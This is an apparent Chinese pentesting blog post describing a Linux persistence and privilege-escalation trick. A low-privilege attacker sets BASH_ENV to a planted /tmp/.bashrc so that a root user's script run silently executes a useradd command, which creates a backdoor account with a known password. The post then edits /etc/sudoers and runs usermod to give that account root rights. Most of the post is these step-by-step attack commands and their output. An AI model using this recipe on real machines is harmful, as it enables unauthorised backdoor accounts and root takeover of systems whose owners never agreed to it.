linux渗透的奇技淫巧

linux渗透的奇技淫巧

在网上get到了一个给Linux添加用户的技巧,通过环境变量执行脚本,进而达到添加 用户的目的。算不上是提权,记录一下,或许以后会有用。
通常,Linux在执行bash脚本时,如果BASH_ENV被设置的话,它就会执行BASH_ENV指向 的脚本。
首先先看一个例子

第一步:建立一个test.sh脚本

!#/bin/bash
echo "test"

第二步:在/tmp/目录下建立一个.bashrc

!#/bin/bash
echo "bashrc"

第三步:设置环境变量$BASH_ENV

echo $BASH_ENV
export BASH_ENV="/tmp/.bashrc"

第四步:设置脚本权限,执行脚本,查看输出

chmod 775 test.sh
./test.sh
结果会输出
bashrc
test

可以看出,如果设置了环境变量BASH_ENV,如果用户执行sh脚本,则会执行BASH_ENV 指向的脚本。那么如何利用呢?

当我们拿到Linux的低权限用户时,可以查看一下主机是否经常用su来登录root,如果有这样的情况,那么就可以这样做……(看下面)
首先看一下su后环境变量在不在,经过在自己的机器上检查,su后$BASH_ENV还是存在的,那就好办了。
现在在/tmp/.bashrc中写入如下内容

useradd -p `openssl passwd -l -salt '123' test1234` test

/这是注释,不用谢(增加用户test,密码为test1234)/
主机用户利用su登录到root用户后,执行.sh脚本,就会先去执行如上命令,成功添加用户。
用 cat /etc/passwd可以看到结果
需要注意的:
1.test.sh的权限设置别错了
2.这里不能直接加入root组,除非在.sh脚本里写一个功能,实现修改修改/etc/sudoers文件。
找到下面一行,把前面的注释(#)去掉

## Allows people in group wheel to run all commands
%wheel    ALL=(ALL)    ALL

然后在再执行命令

usermod -g root test

这样就可以添加拥有root权限的用户了。

怎么给普通用户root权限?请移步
learning from

你可能感兴趣的:(内网渗透)